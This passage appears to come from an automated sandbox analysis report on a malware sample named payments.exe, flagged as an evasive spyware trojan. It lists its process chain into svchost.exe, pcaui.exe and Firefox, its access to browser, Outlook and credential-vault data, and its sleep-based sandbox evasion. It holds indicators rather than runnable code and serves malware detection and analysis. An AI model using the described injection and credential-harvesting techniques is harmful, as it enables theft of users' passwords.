                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0466D8004_2_0466D800
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046038E04_2_046038E0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046099504_2_04609950
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461B9504_2_0461B950
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046959104_2_04695910
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04673A6C4_2_04673A6C
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFA494_2_046BFA49
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046B7A464_2_046B7A46
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046ADAC64_2_046ADAC6
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04645AA04_2_04645AA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0469DAAC4_2_0469DAAC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046A1AA34_2_046A1AA3
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046BFB764_2_046BFB76
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04675BF04_2_04675BF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0463DBF94_2_0463DBF9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_0461FB804_2_0461FB80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B20804_2_026B2080
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026ACF604_2_026ACF60
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB2A44_2_026AB2A4
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB2B04_2_026AB2B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AB1604_2_026AB160
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026AD1804_2_026AD180
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B57304_2_026B5730
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026B39304_2_026B3930
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026CBE104_2_026CBE10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE6DC4_2_044CE6DC
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE2C84_2_044CE2C8
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CE3E44_2_044CE3E4
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CD8484_2_044CD848
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CD8134_2_044CD813
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_044CCAE84_2_044CCAE8
                Source: C:\Users\user\Desktop\payments.exe | Code function: String function: 00CB6AC0 appears 42 times
                Source: C:\Users\user\Desktop\payments.exe | Code function: String function: 00CBF8A0 appears 35 times
                Source: C:\Users\user\Desktop\payments.exe | Code function: String function: 00CAEC2F appears 68 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 110 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: String function: 04635130 appears 58 times
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: String function: 0467F290 appears 105 times
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: String function: 045EB970 appears 280 times
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: String function: 0466EA12 appears 86 times
                Source: C:\Windows\SysWOW64\pcaui.exe | Code function: String function: 04647E54 appears 110 times
                Source: payments.exe, 00000000.00000003.1350154927.0000000003AED000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs payments.exe
                Source: payments.exe, 00000000.00000003.1357005874.0000000003993000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs payments.exe
                Source: payments.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@19/15
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDCE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCAB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CDE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CD6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CEC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00C9406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\payments.exe | File created: C:\Users\user\AppData\Local\Temp\aut32B9.tmp
                Source: C:\Users\user\Desktop\payments.exe | Command line argument: `> (0_2_00C93A0F)
                Source: C:\Users\user\Desktop\payments.exe | Command line argument: `> (0_2_00C93A0F)
                Source: payments.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\payments.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: pcaui.exe, 00000004.00000003.1652156354.0000000002923000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.0000000002944000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1654649705.0000000002951000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.0000000002974000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1652156354.0000000002944000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknown | Process created: C:\Users\user\Desktop\payments.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Users\user\Desktop\payments.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\payments.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\payments.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: pcaui.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: dui70.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wer.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\pcaui.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\pcaui.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: payments.exe | Static file information: File size 1213440 > 1048576
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: payments.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XhwUfLdILQipZF.exe, 00000003.00000000.1375164314.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp, XhwUfLdILQipZF.exe, 00000006.00000000.1536552318.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAE01E LoadLibraryA,GetProcAddress,0_2_00CAE01E
                Source: payments.exeStatic PE information: real checksum: 0x12d8bd should be: 0x1309ee
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB6B05 push ecx; ret 0_2_00CB6B18
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB0C5B push es; retf 0_2_00CB0C65
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB0C6E push es; retf 0_2_00CB0C75
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010AEE57 push ebp; retf 0_2_010AEE75
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030C0 push eax; ret 2_2_004030C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0E4 push edx; retf 2_2_0040D0E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040808C push esp; ret 2_2_00408097
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417257 push 00000020h; iretd 2_2_00417259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417260 pushad ; retf 2_2_0041726B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A64 push ecx; ret 2_2_00417A78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EA38 push eax; retf 2_2_0041EA4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172D4 pushad ; retf 2_2_0041726B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EA8D push esp; retf 2_2_0041EA8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416797 push ds; iretd 2_2_004167A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0397AB05 push esp; ret 3_2_0397AB10
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0397FB5D push edx; retf 3_2_0397FB5E
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989210 push ds; iretd 3_2_0398921B
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03988E38 pushad ; iretd 3_2_03988E3E
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03991506 push esp; retf 3_2_03991507
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989D4D pushad ; retf 3_2_03989CE4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_039914B1 push eax; retf 3_2_039914C4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989CD9 pushad ; retf 3_2_03989CE4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0398A4DD push ecx; ret 3_2_0398A4F1
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989CD0 push 00000020h; iretd 3_2_03989CD2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C27FA pushad ; ret 4_2_045C27F9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C225F pushad ; ret 4_2_045C27F9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C283D push eax; iretd 4_2_045C2858
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CF8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CF8111
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00CAEB42
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CB123A
                Source: C:\Users\user\Desktop\payments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\payments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\payments.exe API/Special instruction interceptor: Address: 10ADF74
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\pcaui.exe Window / User API: threadDelayed 2815
                Source: C:\Windows\SysWOW64\pcaui.exe Window / User API: threadDelayed 7159
                Source: C:\Users\user\Desktop\payments.exe Evaded block: after key decision graph_0-94983
                Source: C:\Users\user\Desktop\payments.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-95760
                Source: C:\Users\user\Desktop\payments.exe API coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\pcaui.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656 Thread sleep count: 2815 > 30
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656 Thread sleep time: -5630000s >= -30000s
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656 Thread sleep count: 7159 > 30
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656 Thread sleep time: -14318000s >= -30000s
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804 Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804 Thread sleep time: -57000s >= -30000s
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804 Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\pcaui.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\pcaui.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CD6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00CD6CA9
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CD60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00CD60DD
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CD63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00CD63F9
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CDEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CDEB60
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CDF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00CDF5FA
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CDF56F FindFirstFileW,FindClose, 0_2_00CDF56F
